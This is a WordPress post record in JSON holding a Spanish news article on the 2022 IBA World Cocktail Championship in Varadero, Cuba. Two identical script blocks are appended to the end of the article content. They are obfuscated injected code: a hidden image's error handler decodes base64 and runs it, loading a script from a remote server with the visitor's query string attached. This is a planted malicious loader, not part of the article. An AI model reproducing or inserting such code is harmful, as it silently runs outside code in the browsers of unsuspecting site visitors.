{"id":1744,"date":"2022-11-07T14:42:41","date_gmt":"2022-11-07T17:42:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1744"},"modified":"2025-08-14T00:30:59","modified_gmt":"2025-08-14T03:30:59","slug":"campeonato-mundial-de-cocteleria-reune-en-cuba-a-los-mejores-bartenders-del-mundo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1744","title":{"rendered":"Campeonato Mundial de Cocteler\u00eda re\u00fane en Cuba a los mejores bartenders del mundo"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#53056d\"><em>El 69\u00ba Campeonato Mundial de Cocteler\u00eda, el evento m\u00e1s importante de la International Bartenders Association (IBA), fue inaugurado este viernes en Varadero con un colorido desfile de banderas sobre motos cl\u00e1sicas, en el que participaron todas las delegaciones presentes en el encuentro.<\/em><\/h5>\n\n\n\n<p>Esta es la primera vez que se lleva a cabo un Campeonato Mundial de C\u00f3cteles en Cuba, y la segunda vez en Am\u00e9rica Latina. Tras vencer las candidaturas de Italia y Rusia, la mayor de las islas del Caribe gan\u00f3 la nominaci\u00f3n para celebrar el evento en 2022 debido al nivel profesional de los bartenders cubanos, la capacidad organizativa del pa\u00eds, su seguridad y su hospitalidad.<\/p>\n\n\n\n<p>Alrededor de sesenta naciones de todo el mundo participan en la prestigiosa competencia, representada por un n\u00famero igual de camareros para competir en estilo cl\u00e1sico y en Flair; todo ello acompa\u00f1ado por los presidentes de las asociaciones miembro de la IBA.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sp-ao.shortpixel.ai\/client\/to_auto,q_glossy,ret_img,w_1920\/https:\/\/www.traveltradecaribbean.com\/wp-content\/uploads\/2022\/11\/20221104_185117-scaled.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Al inaugurar el evento, el Primer Ministro cubano, Manuel Marrero Cruz, dio la bienvenida a todos los participantes, especialmente a los competidores; al tiempo que destac\u00f3 la importancia de eventos como este, que coloca en una posici\u00f3n alta el potencial del sector en el pa\u00eds y demuestra que Cuba no est\u00e1 aislada en el mundo.<\/p>\n\n\n\n<p>Durante las palabras de apertura, el ministro cubano de Turismo, Juan Carlos Garc\u00eda Granda, afirm\u00f3 que es un honor recibir a los mejores bartenders del mundo en la isla caribe\u00f1a, y que el evento marcar\u00e1 un antes y un despu\u00e9s para la gastronom\u00eda cubana en general. \u00abAsumimos este campeonato no para medir fortalezas, sino para compartir fraternalmente conocimientos y afecto\u00bb, dijo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sp-ao.shortpixel.ai\/client\/to_auto,q_glossy,ret_img,w_1000\/https:\/\/www.traveltradecaribbean.com\/wp-content\/uploads\/2022\/11\/IMG-20221105-WA0012.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>El titular del Ministerio de Turismo destac\u00f3 que la barra cubana es patrimonio de la naci\u00f3n y que esta tradici\u00f3n se materializa en la sucesi\u00f3n de talentosos cantineros, bajo la precisa gu\u00eda de la Asociaci\u00f3n Cubana de Bartenders (ACC), fundada en 1924 y considerada la m\u00e1s antigua de su tipo en el mundo.<\/p>\n\n\n\n<p>Garc\u00eda Granda tambi\u00e9n destac\u00f3 las excelentes condiciones del Hotel Meli\u00e1 Internacional Varadero, elegido para acoger el evento por su impecable servicio, la calidad de sus productos y el buen hacer de su personal; Adem\u00e1s, cuenta con un \u00e1rea de convenciones que supera los 2.000 metros cuadrados en habitaciones y ubicaciones alternativas junto a la piscina, la playa y los jardines.<\/p>\n\n\n\n<p>Por su parte, Giorgio Fada, presidente de la IBA, subray\u00f3 la importancia de celebrar el evento en un pa\u00eds con gran profesionalidad en la mezcla de c\u00f3cteles.<\/p>\n\n\n\n<p>Entre los reconocimientos que avalan la excelente reputaci\u00f3n de la isla caribe\u00f1a dentro de la IBA se encuentran el privilegio de ser la \u00fanica naci\u00f3n de Latinoam\u00e9rica que cuenta con un campe\u00f3n mundial de cocteler\u00eda, adem\u00e1s de cinco campeones panamericanos y dis\u00edmiles bartenders premiados en competencias internacionales. Asimismo, Cuba cuenta con una docena de c\u00f3cteles cl\u00e1sicos que son famosos a escala mundial, como el Daiquir\u00ed, el Mojito y el Cubalibre.<\/p>\n\n\n\n<p>Como novedad, la edici\u00f3n 2022 del Campeonato tendr\u00e1 como base del ron cubano las elaboraciones. El esp\u00edritu base obligatorio durante el evento para la preparaci\u00f3n de c\u00f3cteles en concursos ser\u00e1 de la marca Havana Club, patrocinador del evento.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.traveltradecaribbean.com\/world-cocktail-championship-brings-together-in-cuba-worlds-best-bartenders\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/Captura-web_7-11-2022_144048_www.traveltradecaribbean.com_.jpeg\" alt=\"\" class=\"wp-image-1745\" width=\"149\" height=\"97\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 69\u00ba Campeonato Mundial de Cocteler\u00eda, el evento m\u00e1s importante de la International Bartenders Association (IBA), fue inaugurado este viernes en Varadero con un colorido desfile de banderas sobre motos cl\u00e1sicas, en el que participaron todas las delegaciones presentes en el encuentro. Esta es la primera vez que se lleva a cabo un Campeonato Mundial [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1746,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,22],"tags":[],"class_list":{"0":"post-1744","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1744"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1744"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1744\/revisions"}],"predecessor-version":[{"id":7286,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1744\/revisions\/7286"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1746"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}